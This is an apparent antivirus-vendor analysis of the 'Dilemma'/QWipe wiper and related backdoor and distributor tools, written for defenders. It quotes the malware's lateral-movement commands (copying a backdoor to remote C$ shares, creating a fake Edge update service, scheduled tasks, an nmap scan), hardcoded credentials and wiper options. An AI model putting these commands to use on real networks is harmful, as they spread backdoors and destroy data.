HackTool.Win32.APT- PS

Updated on 03-13-2022:

On 03-11-2022 AFTA Center released a warning related to this set of malware as “detecting a new malware in infrastructure” and called it the “Dilemma” which is the same HackTool.Win32.QWipe and you can read its complete analysis as follows.

Please refer to AFTA Center to read the report.

Technical details

1.1 Modules and malware operation sequences

This malware includes many modules, including executable programs and various scripts, each of which has its small task.
The following is a list of malware files with a brief description of how they work.

File Name Description
HackTool.Win32.PS_Backdoor the malware Backdoor file is used to execute the hacker’s command and to download/upload arbitrary files
HackTool.Win32.QWipe Wiping Hard-disk data, changing users’ passwords, deleting Windows backup files, etc.
wint.bat Run the scheduler task to run the msdskint.exe file service
Lastfile The contents of the last corrupted file path
HackTool.Win32.HttpBackdoor Act as HttpBackdoor to create a backdoor in the system and execute the intruder’s commands
HackTool.Win32.HttpCallBackService The intruder’s HttpCallBackService tool to establish a connection with C&C servers
HackTool.Win32.PS_Distributor Hacker’s HttpBackdoor tool distribution file

Table 1 – Summary of malware payload performance

1.1.1  Description of HackTool.Win32.PS_Backdoor threat performance

This malware acts as a backdoor for the hacker. This file makes the remote command execution from the server possible for the hacker. Other features of this malware are it can download/upload arbitrary files. The whole send/receive data by this file happens through TLS packets.

This malware creates 4 execution sockets along with a local address on the victim’s system and then eavesdropping the data on these sockets. If receiving data, it will send them to its remote server using the below address. The malware uses port 8443 to connect with its remote server. This port like port 443 uses the TLS encryption method to transact packets. Currently, this server is offline.


When using port 443, there’s no need to mention the port beside the domain address. But when using port 8443 it is necessary to note the port beside the domain address.

In the following, we will explain each socket’s performance.

Socket No. Performance For receiving each TLS packet on this socket, the malware creates a cmd.exe process by recalling the main_startshell function and when executing, it will end the cmd.exe process and once again eavesdrop. It seems like the malware uses this socket only to receive execution commands. Receiving HTTP packets under TLS and recalling the main_starthttp function to download/upload files.
49151:[::] Establishing a proxy server between this socket and the hacker’s remote server

Table 2- The malware sockets and their performance

1.1.2 wint.bat file performance

This file executes the malware Wiper service. This is a service with a fake Windows Taks Scheduler name which you can see they’ve used the word Taks instead of Task. This Wiper file has been seen on different systems through the following routes as msdskint.exe and Dilemma.exe:



1.1.3 HackTool.Win32.QWipe performance 

This file is the Wiper that the hacker created which can receive arguments. If there was no entry argument, the file has also contain predefined arguments which use them during execution.

The hacker packed this file using the “Eziriz.NET Reactor” tool to obfuscate the malware codes from the analyzer and the antivirus. In the following, you can read how it acts after being decoded.

In the following table, you can view a list of receivable arguments by the Wiper malware with their performance.

Entry arguments Performance
-wipe-exclude The routes which are placed after this argument will be added to the malware exclusion list so they can be untouched during Wiping activity.
-light-wipe Times when malware buffer has been written on the victim’s system to execute wiping activity.
-sessions It restarts and logs off all system active Sessions
-delete-users Deletes all entered user’s accounts with the argument itself
-shadows Wipes all system backup versions
-start-iis Restarts the iis service
-config Undefined activities
-processes Ends all entered process with the argument itself
Logs- The malware wipes all OS and Event Viewer logs using Windows wevtutil.exe and Enum
-delete Finally, it removes all wiped files from the system, if enters this argument (it will execute Win32Native.DeleteFile file)
-break-users Changes the victim’s system passwords
-wipe-only Wipes only the files on the entered routes
-purge It’s the complete removal and its wiping procedure is different than the normal procedure.
-passwords Undefined activities
-wipe-all Wiping all system drives
-stop-iis Stoping iis service

Table 3- HackTool.Win32.QWipe malware performance

  • -‌break.users argument

If this is the entry argument and a user is specified, the malware sets a password for each defined account. This password is the permanent S7Y1a82R!” string.

Figure 1- changing user’s password by the malware

  • -purge argument

This argument is being used when the malware is wiping files. In general, the value that is considered for wiping data is a 200-byte buffer that its contents are created randomly through an algorithm.

If a purge argument is entered, a full_purge value will be set inside the malware code. This Item is the complete wiping of the malware. In this situation, the wiping procedure is that it writes the buffer value on the file until reaches the end of the file.

Also, the malware contains a purgeExtensions list in its codes, including hackers’ candidate suffixes. So if a file is about to be wiped then it must have one of the following suffixes and the wiping procedure will be the same as the full_purge procedure.

Figure 2- Candidate suffixes

In addition to the above list, there are other strings inside the malware file that can be used as candidate suffixes which are as follows:

.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt
  • -wipe-all argument 

If this is the entry argument, then the whole system’s active drives will be restored inside a list. Then all dive information will be wiped.

Three files will be excluded when wiping information:

  • default.htm
  • index.htm
  • death_to_raisi.exe

In the malware wiping procedure, when there is no set full_purge value nor file suffixes that are among candidate suffixes is that it firstly will write a value of 200 bytes from the defined buffer on the zero offset on the file. Then, the whole file size will be divided into 1024. Then it will restore this value inside the num4.

If there will be no entered value for the light_wipe argument, the minimum amount between light_wipe and num4 will be calculated and written on the num4.

Then it will distance 1024 bytes (0X40) from the offset on the num4 and then write that again on the next 200 bytes as well, so it will continue this pattern till the end of the file. In the end, it will create the lastfile2 file inside the wiped folder and writes the file route in the mentioned folder.

as we have mentioned before, the malware Wiper file if cannot receive any argument as an entry will use its predefined arguments. If this file is executed under the service then it will contain the following default arguments:

Figure 3- string list as the entry arguments

According to these arguments, this service will act as follows:

1- The -light-wipe value will be equal to 3. It means the data wiping buffer has been written 3 times on each file.

2- the iis service will be stopped.

3- it will delete all Windows Event Viewer logs.

4- It will delete all backup files

5- the -processes value will be equal to *sql. It means it ends all processes containing SQL strings in their names.

6- All active drive data except Exclude routs will be wiped

7- The excluded routes by the hacker are as follows:







"C:\Program Files\IBM\*"

"C:\System Volume Information"

"C:\Program Files\dotnet"

"C:\Program Files (x86)\dotnet*"

"C:\Program Files\Symantec*"

"C:\Program Files (x86)\Symantec*"

"C:\Program Files (x86)\Padvish*"

"C:\Program Files\Kaspersky*"

"C:\Program Files (x86)\Kaspersky*"

"C:\Program Files\Microsoft*"

"C:\Program Files (x86)\Microsoft*"

"C:\Program Files\Windows*"

"C:\Program Files (x86)\Windows*"

There’s a function inside the malware commands that shows the hacker was sensitive to Padvish antivirus. For instance, as you can see the Figure 4, the malware monitored the list of executing processes on the victim’s system. If among processes, Padvish or its UI is executing, instead of executing the default functions for wiping information, the malware tries to use another method to wipe data.

It seems that the reason behind changing tactics from the malware is to evade the Padvish behavioral detection system which is detected the malware wiping method and immediately prevents it, but Padvish has also detected and prevented the other methods of the malware.

In the second method, the malware tries to create a temporary bat file (tmp.bat) for each system file and creates two temporary scheduling tasks with system permission for these files.

figure 4- The malware’s searching for Padvish antivirus UI and service

figure 5- the malware changed its wiping method after finding the Padvish antivirus service

In the following, you can view an example of the created bat file

Figure 6- an example of created bat file to wipe data

As it is obvious from the bat file contents, firstly, the malware creates a file containing a null value equal to the file that was supposed to be wiped ( 3072 bytes) with the .qipe extension using Windows fsutil tool. Then it wanted to replace the original file with this fake file.

The hacker knew that Padvish could prevent this malware from wiping data, so it tried to use another method- using a system standard tool- to wipe data. nevertheless, the Padvish anti-ransomware component (Anti-Crypto) successfully prevent this attack.

There are commands inside the malware codes that indicate this malware can restore the run-time software logs when wiping as follows:

There are strings such as  “– Excluded” ، “– Skipped” ، “BreakSelectedUsers” ، “DeleteSelectedUsers” ، “KillProcesses”, etc. This log ends with the “Finished on” string and records the end time when wiping is done. However, seems like the hacker needs not restore the log using the Wiper file because it did not consider a code for the Output function that has the duty of printing the result.

1.1.4 HackTool.Win32. HttpCallbackService performance 

The hacker uses this file as a tool for downloading/uploading files and executing arbitrary commands on the victim’s system. You can read the explanation of this performance below.

This file receives the information related to the malware server from its configuration file or the input.

In the following table you can see the commands that are supported by this tool:

Command Performance
Download/Upload Encrypted downloading from the victim’s site or uploading files to the malware server and vice versa
stay-alive activating isStayAliveMode flag
cool-down Deactivating (for 1 minute) isStayAliveMode flag
Default performance Executing the hacker’s commands through the command line

Tabel 4- HttpCallbackService too command list

In the following figures, you can see the complete scheme of the malware and its receivable queries.

figure 7- HttpCallbackService malware function

figure 8- list of strings and queries

First, the malware reads the hacker’s server address from the configuration file and according to the configuration file contents, the malware considers the following queries.

queries the end string of the configuration file
=m? .aspx
=m? .php
=m /
=m/ default

Table 5- strings and queries

The procedure of receiving commands from the server, for example, the malware server downloading a file from the client is that after connecting to the server, the contents of the file with the name of =m will be recalled from the server. Then after recovering the specified file route, the file will be encrypted using the base64 algorithm and will be sent to the server.

Figure 9- Contents of the command file on the server-side

Figure 10- Encoding file using the malware and sending it to the malware server

If the =, the file contains a command, this command will b executed by cmd.exe

Figure 11- executing commands by cmd.exe

The malware executes its performance results inside a .out file on the victim’s system.

Figure 12- The malware HttpCallbackService output log

1.1.5 HackTool.Win32.HttpBackdoor performance 

This file acts as an HTTP service for the hacker. The information related to the hacker’s arbitrary commands will be restored in two files: uhsvc.exe.start and uhscv.exe.ini. The name of this file was different in separate attacks.

This service which is registered as Microsoft Update Health Host inside the system contains commands to download/upload files and also can connect to SQL database and send the results to the malicious server and manipulate local files. Different versions of the httpservice have been found: 0.1.3vXH and 0.1.4vXH. These versions are not different in performance and accept similar commands.

This file-like a hacker’s Wiper file packed using the “Eziriz .NET Reactor” tool. Additionally, in the malware configuration file, there are other commands as follows.

Command Performance
ipcofig/all Recovering network card IP settings
whoami/all Recovering information related to username, user-group, permissions, and accesses
systeminfo Total system information such as type of the OS, physical and virtual storage space, domain, network card, etc
tasklist List of current processes
wmic logicaldisk get name Names of the partitions of the disk
net user User names of the current system
dir c:\users Displaying information related to files inside the c:\users
net sessions List of the current remote communications
net view/all List of the current shared sources
net share List of shared drives and folders
route print information related to Route tables
netstat-aon Communication table related to active ports
ping -n 2 Checking the connection of the current system to the Internet

Table 6- Used commands inside the HttpBackdoor tool configuration file

The following results are attained after decoding according to the viewed issues:

1- The malware creates a tcpListener inside the victim’s system after is executed under the service. Then, we will explain one of the malware versions that use port 9399. In samples that are found from uhscv.exe.start, the hacker authorized the entry packets to port 9399 ( in some cases port 9396) in the firewall from out of the victim’s system network.

figure 13- uhsvc.exe.start file contents

2- The malware can receive and execute different commands from the hacker’s server. The malware executes these commands using the cmd tool.

Figure 14- Executing hacker’s arbitrary commands using shell

3- Using sqlConnection and sqlCommand functions to execute different queries on the SQL database

4- Creating file

Figure 15- Creating file by the hacker using malware

5- The malware can zip or unzip the directories contents, download/upload, and delete the hacker’s desired files, if necessary. This malware uses the IonicZip library to compress files.

Figure 16- Compressing/ decompressing and removing files

Figure 17- Manipulating directories contents

6- Capability to receive server desired proxies to connect with the server using =b and =p commands

Figure 18- Commands related to proxy

Figure 19- Setting proxy

7- Possibility of displaying the malware version for the hacker (the hacker used multiple versions of HackTool.Win32.HttpBackdoor to implement his operation)

Figure 20- Displaying the malware version

8- Possibility of the current malware file route (“c:\programdata\pcmr\uhsvc.exe” is the malware route).

9- Possibility of creating log files and sending them to show the possible errors to the hacker

Figure 21- Creating a log file

Figure 22- Log file

In the following table, you can see the operation that is supported by the malware:

Command Performance
a_1=s Shellexecute with #zip support
a_1=c Run SQL commands
a_1=i1 View output and error logs and delete them
a_1=i2 Delete output and error logs
a_1=i Run cmd interactively
Cmd= Shellexecute
W_i Show Malware path
V_i Show Malware Version
P=OR b= Act as a proxy and forward connection to another website/infected node

Write any file


Con= Run SQL commands
Prt= File Manager (Browse directories, Download/Upload Files,…)
other Read/Write based on GET

Table 7- Malware web service commands

1.1.6 HackTool.Win32.PS_Distributor Performance

This file act as the distributor tool for the hacker. It has to establish connections with network clients and create and establish hackers’ desired service and scheduled tasks. This file performs distributing tasks on the network.

Figure 23- Starting distributor operation of the malware

This file use Share and “net use” command for its operation. As you can see in the above figure, this file contains a default username and password to connect with the clients:

Username : TicketUser
Password: TicketUser

Additionally, this file can receive information such as username, password, and share folder route as an entry argument. Also, it can receive the list of its desired IP list from the distribiutor.ini.

The malware will copy the Httpservice tool as follows, after connecting with its desired clients:

“copy /y c:\\windows\\msunify4.exe \\\\” + ip + \\c$\\windows\\msedgeupdate.exe

“copy /y c:\\windows\\msunify.start \\\\” + ip + \\c$\\windows\\msedgeupdate.exe.start

As you can see from the above commands, HackTool.Win32.HttpBackdoor tool named msunify4.exe exists in the current system. This file is copied into the destination system by the name of msedgeupdate.exe. msedgeupdate.exe file which is equal to msunify. the start is the configuration file of the above tool.

Figure 24- Malware connecting network clients

Then the malware will create the following service:

“sc \\\\” + ip + ” create \”Microsoft Edge Update Service (edgeupdatel)\” binpath= \”c:\\windows\\msedgeupdate.exe\” start= auto”

“sc \\\\” + ip + ” start \”Microsoft Edge Update Service (edgeupdatel)\””

As you can see, a  Microsoft Edge Update Service (edgeupdatel) service is created and executed inside the client for the msedgeupdate.exe file (HackTool.Win32.HttpBackdoor tool).

Figure 25- Creating and executing service on the clients

Then, the malware will create a scheduled task to execute the desired tool inside the clients.

“copy c:\\windows\\msunify.css \\\\” + ip + \\c$\\Users\\Public\\CreateService.bat

“schtasks /create /S {0} /tn \”Backup checks\” /XML c:\\windows\\msunify4.xml /U \”{1}\” /P \”{2}\” /F”

“schtasks /run /S {0} /tn \”Backup checks\” /U \”{1}\” /P \”{2}\””

The above commands show that the malware is copied a msunify.css file from the current system named CreateService.bat inside the client and on the c$\\Users\Public\\. This file has to extract Nmap.exe to detect any security holes (flaws) in the network configurations. After recovering data, it will restore them inside the file named pse200.tmp. The following command shows the CreateService.bat file.

c:\windows\temp\nmp\nmap.exe -sV -oN C:\windows\temp\pse200.tmp

Finally, the HackTool.Win32.PS_Distributor tool will create a scheduled task named Backup Checks for the file msunify4.xml.

Figure 26- creating a scheduled task by  HackTool.Win32.PS_Distributor

2. How to encounter this malware

All detected versions and types of this malware detected by Padvish Antivirus as HackTool.Win32.HTTPbackdoor, HackTool.Win32.PS_Backdoor,  HackTool.Win32.PS_DistributorHackTool.Win32.HTTPCallBackService and Trojan.Win32.QWipe.

Additionally, the unique features of Padvish Data Protection with detecting the malware Wipe performance, preventing any data tampering, and putting an end to the malware execution.

3. Indicator of Compromise (IOC)

File name MD5




























































Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>